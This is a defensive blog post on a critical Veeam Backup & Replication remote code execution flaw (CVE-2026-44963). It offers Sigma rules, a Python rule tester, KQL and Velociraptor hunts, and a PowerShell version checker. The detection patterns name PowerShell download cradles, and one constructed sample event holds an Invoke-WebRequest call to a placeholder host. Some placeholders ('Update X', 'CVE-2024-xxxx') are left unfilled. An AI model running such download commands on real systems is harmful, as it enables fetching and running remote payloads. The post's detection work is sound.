
CVE-2026-44963: Veeam Backup & Replication Critical RCE — Detection and Hardening Guide

Security Arsenal Team
June 9, 2026

On Tuesday, Veeam released a critical security update addressing a severe remote code execution (RCE) vulnerability in its Backup & Replication software. Tracked as CVE-2026-44963, this flaw carries a CVSS score of 9.4, placing it in the Critical severity band and posing a serious risk to enterprise environments worldwide.

For security practitioners, this is a "drop everything" moment. Backup infrastructure is the final line of defense against ransomware and data destruction operations. A compromise here typically invalidates the integrity of your disaster recovery strategy. What makes CVE-2026-44963 particularly dangerous is the low barrier to entry: it allows an authenticated domain user to execute arbitrary code on the Backup Server. In many Active Directory environments, domain user credentials are relatively easily obtained via initial access brokers or simple phishing, making this vulnerability a prime candidate for lateral movement and privilege escalation.

Technical Analysis

CVE Identifier: CVE-2026-44963
CVSS Score: 9.4 (Critical)
Affected Component: Veeam Backup & Replication (Backup Server)
Attack Vector: Network / Adjacent
Attack Complexity: Low
Privileges Required: Low (Domain User)
User Interaction: None

The vulnerability stems from an insecure interaction between the Veeam Backup Server and Active Directory domain authentication mechanisms. According to the vendor advisory, an attacker who has compromised a standard domain user account can leverage this flaw to achieve remote code execution on the Backup Server itself; no Veeam-specific role or privilege beyond that domain account is needed.

From a defender's perspective, the attack chain likely involves abusing a specific API or service endpoint within the Veeam infrastructure that implicitly trusts domain context without properly validating the input or sanitizing the execution environment. This results in the Backup Server (often running with SYSTEM or high-privilege service accounts) executing commands provided by the low-privileged domain user.

Exploitation Status: While specific in-the-wild exploitation has not been publicly confirmed at the time of writing, the criticality (CVSS 9.4) and the prevalence of Veeam in enterprise environments suggest that weaponization is imminent. Historical precedents involving backup software (e.g., CVE-2024-xxxx series) show that attackers pivot to these targets immediately following patch disclosure.

Detection & Response

Detecting exploitation of this vulnerability requires monitoring the Veeam.Backup.Service and Veeam.Backup.Manager processes for anomalous child process creation. Since the flaw results in RCE, the primary indicator is the backup service spawning unauthorized shells or network tools.

Sigma Rules

The following Sigma rules identify suspicious process lineage indicative of successful exploitation.

YAML
---
title: Veeam Backup Service Spawning Shell
id: a8f9b2c1-4d3e-4a5f-8b6d-1e2f3a4b5c6d
status: experimental
description: Detects Veeam Backup Service or Manager spawning cmd.exe or powershell.exe, indicative of RCE exploitation.
references:
  - https://veeam.com/security
author: Security Arsenal
date: 2026/06/03
tags:
  - attack.execution
  - attack.t1059.001
  - attack.t1059.003
logsource:
  category: process_creation
  product: windows
detection:
  selection_parent:
    ParentImage|contains:
      - '\Veeam.Backup.Service.exe'
      - '\Veeam.Backup.Manager.exe'
  selection_child:
    Image|endswith:
      - '\cmd.exe'
      - '\powershell.exe'
      - '\pwsh.exe'
  condition: all of them
falsepositives:
  - Legitimate administrative scripts run by backup admins (rare)
level: critical
---
title: Veeam Service Spawning Network Utilities
id: b7e8c3d2-5e4f-4b6a-9c7e-2f3a4b5c6d7e
status: experimental
description: Detects Veeam Backup services spawning common network reconnaissance or lateral movement tools.
references:
  - https://veeam.com/security
author: Security Arsenal
date: 2026/06/03
tags:
  - attack.lateral_movement
  - attack.t1021.002
logsource:
  category: process_creation
  product: windows
detection:
  selection_parent:
    ParentImage|contains:
      - 'Veeam.Backup.Service.exe'
  selection_child_img:
    Image|endswith:
      - '\powershell.exe'
      - '\cmd.exe'
  selection_child_cli:
    CommandLine|contains:
      - 'New-Object System.Net.WebClient'
      - 'Invoke-WebRequest'
      - 'net.exe'
      - 'net use'
  condition: all of selection_parent* and selection_child_img and selection_child_cli
falsepositives:
  - Unknown
level: high
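To show what the two rules above actually match, here is an added Python example (not part of the original post and not Security Arsenal's code) that encodes the same selections, with Sigma's default case-insensitive `contains`/`endswith` semantics, and runs them over a handful of constructed process-creation events in Sysmon-style field names. The events, paths and command lines are made up for the example; the rule logic is taken from the rules as written.

```python
"""Evaluate the two Veeam Sigma rules above against sample process-creation events."""
from __future__ import annotations
import json

# Sigma plain-string matching is case-insensitive; mirror that here.
def _contains_any(value: str, needles: tuple[str, ...]) -> bool:
    v = value.lower()
    return any(n.lower() in v for n in needles)

def _endswith_any(value: str, suffixes: tuple[str, ...]) -> bool:
    v = value.lower()
    return any(v.endswith(s.lower()) for s in suffixes)

# Selections lifted from the two Sigma rules.
VEEAM_PARENTS = ("\\Veeam.Backup.Service.exe", "\\Veeam.Backup.Manager.exe")
SHELLS = ("\\cmd.exe", "\\powershell.exe", "\\pwsh.exe")
NETWORK_CLI_MARKERS = ("New-Object System.Net.WebClient", "Invoke-WebRequest",
                       "net.exe", "net use")

def rule_veeam_spawning_shell(ev: dict) -> bool:
    """Rule 1: ParentImage contains a Veeam service AND Image ends with a shell."""
    return (_contains_any(ev.get("ParentImage", ""), VEEAM_PARENTS)
            and _endswith_any(ev.get("Image", ""), SHELLS))

def rule_veeam_spawning_network_utils(ev: dict) -> bool:
    """Rule 2: parent is Veeam.Backup.Service, child is cmd/powershell,
    and the command line carries a download or share-mapping marker."""
    return (_contains_any(ev.get("ParentImage", ""), ("Veeam.Backup.Service.exe",))
            and _endswith_any(ev.get("Image", ""), ("\\powershell.exe", "\\cmd.exe"))
            and _contains_any(ev.get("CommandLine", ""), NETWORK_CLI_MARKERS))

RULES = (
    ("Veeam Backup Service Spawning Shell", "critical", rule_veeam_spawning_shell),
    ("Veeam Service Spawning Network Utilities", "high", rule_veeam_spawning_network_utils),
)

def evaluate(events: list[dict]) -> list[dict]:
    """Return one hit per (event, rule) pair that fires, in event order."""
    hits = []
    for idx, ev in enumerate(events):
        for title, level, predicate in RULES:
            if predicate(ev):
                hits.append({"event": idx, "rule": title, "level": level,
                             "image": ev.get("Image", ""),
                             "cmdline": ev.get("CommandLine", "")})
    return hits

# Constructed sample events (not real telemetry). Paths use the default Veeam install dir.
VEEAM_DIR = "C:\\Program Files\\Veeam\\Backup and Replication\\Backup\\"
SAMPLE_EVENTS = [
    # 0: backup service spawns cmd.exe -> rule 1 fires
    {"ParentImage": VEEAM_DIR + "Veeam.Backup.Service.exe",
     "Image": "C:\\Windows\\System32\\cmd.exe",
     "CommandLine": "cmd.exe /c whoami", "User": "NT AUTHORITY\\SYSTEM"},
    # 1: backup service spawns powershell with a download cradle -> rules 1 and 2 fire
    {"ParentImage": VEEAM_DIR + "Veeam.Backup.Service.exe",
     "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": "powershell.exe -NoProfile -Command \"Invoke-WebRequest http://placeholder.invalid/x\"",
     "User": "NT AUTHORITY\\SYSTEM"},
    # 2: normal Veeam lineage, service starts the manager -> no hit
    {"ParentImage": VEEAM_DIR + "Veeam.Backup.Service.exe",
     "Image": VEEAM_DIR + "Veeam.Backup.Manager.exe",
     "CommandLine": "\"Veeam.Backup.Manager.exe\" backup", "User": "NT AUTHORITY\\SYSTEM"},
    # 3: interactive user opens PowerShell from Explorer -> parent not Veeam, no hit
    {"ParentImage": "C:\\Windows\\explorer.exe",
     "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": "powershell.exe", "User": "CORP\\jdoe"},
    # 4: manager spawns pwsh -> rule 1 fires; rule 2 does not (parent is not the Service, no marker)
    {"ParentImage": VEEAM_DIR + "Veeam.Backup.Manager.exe",
     "Image": "C:\\Program Files\\PowerShell\\7\\pwsh.exe",
     "CommandLine": "pwsh.exe -File C:\\Scripts\\post-job.ps1", "User": "NT AUTHORITY\\SYSTEM"},
]

if __name__ == "__main__":
    for hit in evaluate(SAMPLE_EVENTS):
        print(json.dumps(hit))
```

Event 4 is the case worth noting when tuning: rule 1 fires on the Manager parent, but rule 2 only names `Veeam.Backup.Service.exe`, so a post-job script launched by the Manager is reported once, at critical, rather than twice. Whether that lineage is legitimate in your environment is exactly the false-positive question the first rule's `falsepositives` entry raises.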

Microsoft Sentinel / Defender KQL

Hunt for unusual child processes spawned by Veeam services in the last 24 hours.

KQL — Microsoft Sentinel / Defender
DeviceProcessEvents
| where Timestamp > ago(1d)
| where InitiatingProcessFileName has_any ("Veeam.Backup.Service", "Veeam.Backup.Manager")
| where FileName in~ ("cmd.exe", "powershell.exe", "pwsh.exe", "powershell_ise.exe", "wscript.exe", "cscript.exe")
| project Timestamp, DeviceName, InitiatingProcessFileName, FileName, CommandLine, AccountName, InitiatingProcessCommandLine
| order by Timestamp desc

Velociraptor VQL

Hunt endpoints for instances where Veeam services have spawned command interpreters.

VQL — Velociraptor
-- Hunt for Veeam processes spawning shells.
-- VQL has no SQL-style JOIN and pslist() exposes Name, not ProcessName;
-- foreach() over the set of Veeam parents is the idiomatic way to join parent and child rows.
LET veeam_parents = SELECT Pid AS ParentPid,
                           Name AS ParentProcess,
                           CommandLine AS ParentCLI
                    FROM pslist()
                    WHERE Name =~ "(?i)^Veeam\\.Backup\\.(Service|Manager)\\.exe$"

SELECT * FROM foreach(
  row=veeam_parents,
  query={
    SELECT ParentProcess, ParentCLI,
           Name AS ChildProcess,
           CommandLine AS ChildCLI,
           Pid, Username
    FROM pslist()
    WHERE Ppid = ParentPid
      AND Name =~ "(?i)^(cmd|powershell|pwsh)\\.exe$"
  })

Remediation Script (PowerShell)

Run this script on your Veeam Backup Servers to check the current build version. Note that you must manually verify the build number against the Veeam security advisory linked below, as specific patched versions may vary by update branch.

PowerShell
# Veeam Version Checker for CVE-2026-44963 Response
Write-Host "[+] Checking Veeam Backup & Replication Version..." -ForegroundColor Cyan

$RegPath = "HKLM:\SOFTWARE\Veeam\Veeam Backup and Replication"
if (Test-Path $RegPath) {
    # The Version value is not guaranteed to exist on every build; report its absence
    # explicitly rather than printing an empty version string.
    $Version = (Get-ItemProperty -Path $RegPath -ErrorAction SilentlyContinue).Version
    if ([string]::IsNullOrEmpty($Version)) {
        Write-Host "[-] Registry key found but no Version value present. Confirm the build from the Veeam console instead." -ForegroundColor Yellow
    } else {
        Write-Host "[!] Current Version Detected: $Version" -ForegroundColor Yellow
        Write-Host "[+] ACTION REQUIRED: Please verify this version against the official Veeam advisory for CVE-2026-44963." -ForegroundColor Red
        Write-Host "[+] If version is below the patched build, apply Update X immediately." -ForegroundColor Red
    }
} else {
    Write-Host "[-] Veeam Backup & Replication registry keys not found. Is this a Backup Server?" -ForegroundColor DarkGray
}

Remediation & Hardening

Given the criticality of this vulnerability, immediate patching is the only effective remediation.

  1. Patch Immediately: Download and install the latest security update from Veeam. Ensure you cover all components, including the Backup Server, Console, and VBR Backup Agents.
  2. Verify Version: After patching, use the PowerShell script above to confirm the updated build number is active.
  3. Restrict Access: As a temporary mitigation until patching is complete, strictly limit which domain users can interact with the Veeam Backup Server. Remove "Domain Users" from local groups or permissions that might allow access to the Veeam console or API.
  4. Audit AD: Identify any dormant or unnecessary domain user accounts that could serve as a beachhead for this attack vector.

Official Advisory: Veeam Security Advisory
